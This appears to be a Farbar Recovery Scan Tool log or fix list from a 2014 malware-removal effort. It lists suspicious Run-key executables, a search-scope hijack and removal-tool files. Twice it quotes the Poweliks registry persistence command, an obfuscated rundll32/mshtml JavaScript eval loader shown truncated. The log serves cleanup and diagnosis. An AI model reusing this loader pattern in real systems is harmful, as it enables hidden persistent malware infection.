HKU\S-1-5-21-2779640238-3425638059-3520445709-1001\...\Run: [khohvetj] => "C:\Users\Bobbie\AppData\Local\amqwigsr.exe" HKU\S-1-5-21-2779640238-3425638059-3520445709-1001\...\Run: [uvafqhqt] => "C:\Users\Bobbie\AppData\Local\jrsxilre.exe" HKU\S-1-5-21-2779640238-3425638059-3520445709-1001\...\Run: [Olpigeex] => C:\Users\Bobbie\AppData\Roaming\Ushoanyf\ryvue.exe HKU\S-1-5-21-2779640238-3425638059-3520445709-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks! SearchScopes: HKU\S-1-5-21-2779640238-3425638059-3520445709-1001 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://slirsredirect...mrud=13-11-2012 Toolbar: HKU\S-1-5-21-2779640238-3425638059-3520445709-1001 -> No Name - {BA00B7B1-0351-477A-B948-23E3EE5A73D4} - No File 2014-12-18 16:30 - 2014-12-18 16:30 - 00000640 _____ () C:\Users\darin\Desktop\JRT.txt 2014-12-18 16:26 - 2014-12-18 16:26 - 01707646 _____ (Thisisu) C:\Users\darin\Desktop\JRT.exe 2014-12-18 16:05 - 2014-12-18 16:06 - 02166272 _____ () C:\Users\darin\Desktop\AdwCleaner.exe 2014-12-17 19:15 - 2014-12-17 19:16 - 00018959 _____ () C:\Users\darin\Desktop\Addition.txt 2014-12-17 19:14 - 2014-12-17 19:16 - 00025454 _____ () C:\Users\darin\Desktop\FRST.txt 2014-12-17 19:11 - 2014-12-17 19:11 - 01113600 _____ (Farbar) C:\Users\darin\Desktop\FRST.exe 2014-12-16 21:36 - 2014-12-16 21:36 - 00037904 _____ () C:\Users\darin\Desktop\Extras.Txt 2014-12-16 21:34 - 2014-12-16 21:34 - 00052860 _____ () C:\Users\darin\Desktop\OTL.Txt 2014-12-16 21:14 - 2014-12-16 21:15 - 00602112 _____ (OldTimer Tools) C:\Users\darin\Desktop\OTL.exe CustomCLSID: HKU\S-1-5-21-2779640238-3425638059-3520445709-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks? EmptyTemp: